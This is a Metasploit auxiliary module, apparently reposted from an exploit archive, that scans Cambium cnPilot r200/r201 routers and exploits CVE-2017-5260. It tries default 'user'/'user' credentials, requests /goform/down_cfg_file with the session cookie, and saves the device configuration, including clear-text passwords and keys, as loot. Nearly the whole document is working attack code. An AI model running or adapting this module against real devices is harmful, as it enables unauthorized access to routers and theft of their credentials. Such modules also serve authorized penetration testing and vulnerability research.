Share
## https://sploitus.com/exploit?id=PACKETSTORM:181024
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::CNPILOT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Cambium cnPilot r200/r201 Login Scanner and Config Dump',  
'Description' => %{  
This module scans for Cambium cnPilot r200/r201 management login  
portal(s), attempts to identify valid credentials, and dump device  
configuration.  
  
The device has at least two (2) users - admin and user. Due to an  
access control vulnerability, it is possible for 'user' account to access full  
device config. All information, including passwords, and keys, is stored  
insecurely, in clear-text form, thus allowing unauthorized admin access to any  
user.  
},  
'Author' =>  
[  
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'  
],  
'References' =>  
[  
['CVE', '2017-5260'],  
['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']  
],  
'License' => MSF_LICENSE  
)  
)  
  
register_options(  
[  
OptInt.new('TIMEOUT', [true, 'HTTP connection timeout', 10]),  
Opt::RPORT(80), # Application may run on a different port too. Change port accordingly.  
OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'user']),  
OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'user'])  
], self.class  
)  
end  
  
def run_host(ip)  
unless is_app_cnpilot?  
return  
end  
end  
  
#  
# Login & initiate dump_config  
#  
  
def run_login  
each_user_pass do |user, pass|  
cookie = do_login(user, pass)  
if cookie == 'skip'  
# do nothing  
else  
dump_config(cookie)  
end  
end  
end  
  
#  
# Dump device configuration  
#  
  
def dump_config(the_cookie)  
res = send_request_cgi(  
{  
'uri' => '/goform/down_cfg_file',  
'method' => 'GET',  
'cookie' => the_cookie,  
'headers' => {  
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'  
}  
}  
)  
  
if res && res.code == 200 && res.headers['content-disposition']  
print_status("#{rhost}:#{rport} - dumping device configuration")  
print_good("#{rhost}:#{rport} - Configfile.cfg retrieved successfully!")  
loot_name = 'Configfile.cfg'  
loot_type = 'text/plain'  
loot_desc = 'Cambium cnPilot Config'  
path = store_loot(loot_name, loot_type, datastore['RHOST'], res.body, loot_desc)  
print_good("#{rhost}:#{rport} - File saved in: #{path}")  
else  
print_error("#{rhost}:#{rport} - Failed to retrieve config. Set a higher HTTPCLIENTTIMEOUT and try again.")  
return  
end  
end  
end